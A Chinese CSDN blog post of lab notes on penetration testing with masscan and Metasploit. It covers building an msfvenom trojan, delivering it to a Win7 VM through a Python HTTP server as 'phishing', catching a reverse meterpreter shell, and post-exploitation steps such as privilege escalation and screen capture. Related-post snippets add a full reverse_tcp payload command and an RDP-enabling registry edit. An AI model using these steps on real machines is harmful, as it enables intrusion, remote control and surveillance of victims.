内网渗透笔记——msf

已于 2022-01-22 01:43:14 修改
阅读量4.6k 收藏 16
点赞数 1
文章标签: 安全 linux
于 2022-01-22 00:07:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wang_zui_zui/article/details/122621992
版权

Masscan

号称五分钟扫遍互联网


性能优越,极限速度 1000w/s,参数 跟 nmap 差不多

-p 80,8000-8100 10.0.0.0/24
--max-rate=100000    //发包的极限速度


masscan 0.0.0.0/0 -p 0-65535     //扫描整个互联网的所有端口

不要轻易尝试.......

Metasploit(msf)

一旦出现漏洞,出现利用漏洞的方法,则会马上收录——傻瓜式攻击

早期想要利用漏洞——需知道漏洞的poc和exp

poc:漏洞验证脚本(只会告诉你存在这个漏洞)

​ log4j:calc

exp:漏洞利用脚本(详细操作方法)

msf分为两大块


msfconsole(控制台)

msfvenom(木马生成平台,一键生成木马)

metasploit v6.1.4-dev                           ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion  

exploite:漏洞利用,配合payload

payload:成功exp后,攻击过程中执行的指令或代码,反弹shell,也可以是直接在目标系统中执行的指令

- singles:所有代码都在一个文件中(大木马),会受到内存空间的限制
- stagers:传输payload所建立的连接,安全的把我们的payload传输到目标运行(stages)
- stages:stagers建立连接后,在传输的代码(payload)

auxiliary:辅助模块,用于信息收集,没有payload的exp
encoders:编码模块,对payload进行加密,躲避杀毒的查杀

post:取得shell,进一步运行的攻击指令(后渗透)

nops:空指令,起到混淆的作用

evasion:免杀,效果非常好,但具有时限性,百分百免杀

msfdb(msf数据库,用于信息收集的存储)

msfdb init          初始化数据库

service postgresql start      启动数据库
msfdb run   自动启用连接数据库

db_status        查询是否连接数据库

hosts、services      查询扫描到的数据

db_nmap == nmap(但是nmap不会存入数据库)

connect 192.168.111.131 4444  类似nc的小工具(这里是正向连接)

注意:初始化数据库,启动数据库之后,要重启控制台(exit——msfconsole)

use exploit/multi/handler      监听模块

-info 

-show options     都是查看命令

常见payload连接方式
payload:
    bind        正向
    reverse        反向
    http        80
    https        443

payload设置方式:

set payload 操作系统/[架构/]终端/连接方式

 meterpreter      升级版shell

 LHOST ——本地ip        LPORT——端口

完成

run开始监听(或者exploit)

msfvenom

木马生成平台

-p            设置payload
-a            架构 x64 x86
      --platform    设置平台 windows/linux
-e            编码
-i            迭代
-f            文件格式
        -f raw -o 1.apk
        R -o 1.apk
-o            输出文件
    >
-l | --list            信息详细

注意!生成的payload 要和console设置的payload大致相同

比如你监听的是windows的木马,你生成的是linux的木马,很明显不合理


lhost=本机ip
rhost=目标ip

以上面设置的payload为例子,生成一个木马

好了,现在至关重要的问题来了,该怎么把木马放到受害者的靶机上呢?

最常用的方法——钓鱼


在当前文件夹快速开启http服务——搭建本地的一个网页
python2.7 -m SimpleHTTPServer 8080
python3.9 -m http.server 8080

靶机进入临时网站

注意一点,win7靶机要事先关闭防火墙,不然kali无法ping通win7

这里有奇怪的一点,输http://192.168.111.130:8080/可以访问,但是输192.168.111.130:8080无法访问,有点玄学。

 kali立刻就会显示访问网页的ip地址

kali开始监听

靶机下载木马并运行

 

kali获得反弹shell,成功!

shell

shell ctrl_z          shell放入后台

sessions             查看后台的连接

 sessions -u ID       shell 会话提升→meterpreter

meterpreter

meterpreter  bg          返回上层

信息收集
getuid
getsid

sysinfo
getsystem    一键提权,失败率较高,满试试

 run vnc  直接直播

以网页的方式查看    >    直播
screenshare

常用的后渗透信息收集

 

王嘴嘴
关注
  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf渗透
10-29
msf渗透
MSF渗透笔记
07-03 245
进入meterpreter模式 在meterpreter中输入shell即可进入CMD窗口接着即可执行CMD命令,例如打开RDP服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f meterpr...
渗透测试神器-msf基础
最新发布
qq_53058639的博客
05-13 675
Exploit:msf最核心的模块,里面有针对不同操作系统不同服务的攻击,包括mac和andriodencoders没啥用,编码,自己提供编码倒是可以evasion:免杀,也没啥用,现在免杀也免不了被杀Ms17-010:ms指微软17-010指17年编号010的漏洞。
MSF多层内渗透全过程
include_voidmain的博客
08-16 2259
MSF多层内渗透全过程
渗透-如何利用msf把流量代理进内-隧道搭建
weixin_42109829的博客
01-10 6722
0x01 前言 在攻防演练时,当我们拿下主机时,我们要开始对内进行渗透,常见的手法有,frp,ew,等代理工具,这里我介绍一个工具 msf 模块中的socket 4a代理工具,这里我使用的是msf 5的版本,好像在使用msf 6的版本一直不成功的样子,所以你们做遇到代理不成功的情况下,可以尝试换个msf 5的版本进行尝试。 0x02 生成路由 msf操作 拓扑图如下 首先先生成一个elf 马进行上线 linux 生成木马上线文章—>linux主机生成木马攻击 run autoroute -s ip
[内渗透]msfconsole提权
purvispanwu的博客
03-17 1286
1.环境准备 kali虚拟机 IP:192.168.112.66 靶机 win7 SP1 IP:192.168.112.145 2.生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.66 lport=4444 -f exe -o /tmp/purvis.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.112.66
Bt5+msf+ettercap内渗透
01-20
kali linux 内渗透视频教程,详细的操作过程和原理。
浅谈MSF渗透测试
02-24
是信息收集、漏洞扫描、权限提升、内渗透等集成的工具。前不久MSF从4.7升级到MSF5.0,其中改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一个Web服务...
MSF11111
01-05
渗透测试中,Metasploit(MSF)是一个常用的安全工具,用于模拟攻击和漏洞利用。本文将详细讲解如何在内环境中配置MSF,包括PostgreSQL数据库的安装、管理以及MSF数据库的设置。 首先,安装PostgreSQL数据库...
msf 渗透测试
06-05
msf渗透
安全:Msfconsole攻击技术(成功拿下服务器最高权限.)
热门推荐
网络安全领域___专研者.
03-22 1万+
Msfconsole工具概括: Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用. (1)进行端口扫描. (2)进行服务的扫描.(3)扫描3306(Mysql)端口的弱口令.(4)在msf模块里也可以使用nmap进行扫描.(5)扫描了服务器是用Win XP,然后对服务器进行渗透测试.
渗透测试笔记】之【MSF Exploit模块】
AA8j的博客
11-05 1077
Exploit Active exploit 主动连接,需要目标关闭防火墙。 win8利用smb漏洞演示: # 使用漏洞模块 msf5 > use exploit/windows/smb/psexec # 查看选项 msf5 exploit(windows/smb/psexec) > show options # 配置必要参数(目标主机地址,用户名密码等) msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.172.132 msf5
MSF Exploit入侵电脑实践(Win7/Win10皆可)
xiaohujiang的博客
07-10 5812
msf exploit入侵电脑(Win7/Win10皆可) 需要的工具:msfvenom . msfconsole (kali里面有) msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.144 LPORT=6666 -f exe -o xss.exe msfven
msf
u010472385的专栏
05-11 1579
0xx1 msfd interface -------------- //msfd 是一个打开络接口的工具,可以让一个或多个用户远程连接到msf安装机器上远程使用msf 例子 1.打开端口的命令 # msfd -a   -P 2.查看是否打开端口 # netstat -tnl 3.远程连接MSF # nc 4.结束打开的端口
MSF常用命令|Metasploit术语
qq_60115503的博客
04-20 1230
渗透攻击(Exploit) 渗透攻击是指由攻击者或者渗透测试者利用系统,应用或服务中的安全漏洞,所进行的攻击行为 流行的攻击技术包括,缓冲区溢出,web应用程序漏洞攻击,以及利用配置错误等,渗透攻击是指由攻击者或者渗透测试者利用系统,应用或服务中的安全漏洞,所进行的攻击行为,流行的攻击技术包括:缓冲区溢出,Web应用程序漏洞攻击,以及利用配置错误等 攻击载荷(Payload) 攻击载荷是我们期望目标系统在被渗透攻击后而执行的代码,在MSF框架中可...
Manjaro安装配置Msf(Metasploit)并配置msfdb数据库
weixin_45629684的博客
07-18 1755
简介 最近更换了Manjaro作为我的主力系统,在安装常用的渗透测试工具的时候,安装msf遇到了一些问题 安装 Arch系的pacman之强早有所耳闻,但是没想到有这么强,Msf都可以直接Pacman sudo pacman -S metasploit 至此,msf就成功安装了 配置 问题就出来了msf数据库的配置上,在安装好postgresql之后,仍然无法通过msfdb进行init Missing requirement: 'bundle' does not appear to be installe
渗透-做代理流量转发-msf段攻击(添加路由表)-Windows中ew和proxifier做代理-kali中ew和proxychains4做代理
BING
05-17 2239
0x01代理-windows中ew和proxifier 1.在靶机上上传ew 然后输入下面命令运行,正向代理 ew_for_windows.exe -s sscoked -l 8000 2.在windows启用proxifier,添加服务器,输入靶机上的ip和端口 3.设置代理规则 第一步截图: 第二步截图: 第三步截图: 你可以使用代理了 0x02代理-kali中ew和proxychains4做代理 1.在靶机上上传ew 然后输入下面命令运行,正向代理 ew_for_windows.exe -s
msf 学习笔记(1)
Shadow 爬爬记
10-20 1308
msf数据库链接root@kali:~# msfdb reinit ##数据库重建 root@kali:~# msfdb init ##数据库链接 root@kali:~# service postgresql start ##启动pgsql数据库(5432接口未启动状态【netstat -pantu | grep 5432】) root@kali:~# msfdb start
Kali-msfdb-Postgresql报错排查处理
灰蜗牛
10-26 1838
目录1.报错2.解决方法3.排查过程 1.报错 虚假的报错,关键词: ┌──(xavier㉿xavier)-[~] └─$ psql psql: 错误: 无法连接到服务器:无法联接到服务器: 没有那个文件或目录 服务器是否在本地运行并且在 Unix 域套接字 "/var/run/postgresql/.s.PGSQL.5432"上准备接受联接? 真实的报错,关键词:Postgresql日志文件: ┌──(xavier㉿xavier)-[~] └─$ sudo tail /v
linux内渗透反弹shell
08-03
在Linux内渗透中,反弹shell是一种常见的技术手段。其中,Bash反弹shell是最简单且最常见的一种方式。首先,在攻击机上使用nc命令监听一个端口。然后,在目标机器上使用Python脚本去反向连接攻击机的IP和端口。这样,攻击机的终端就可以获得目标机器的shell。除了Bash反弹shell,还可以使用Kali的MSF框架生成木马来反弹shell。此外,在内渗透中,还经常涉及端口转发和正向代理的概念。这些技术手段可以帮助渗透测试人员在内环境中获取更多的权限和信息。[1][2][3]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值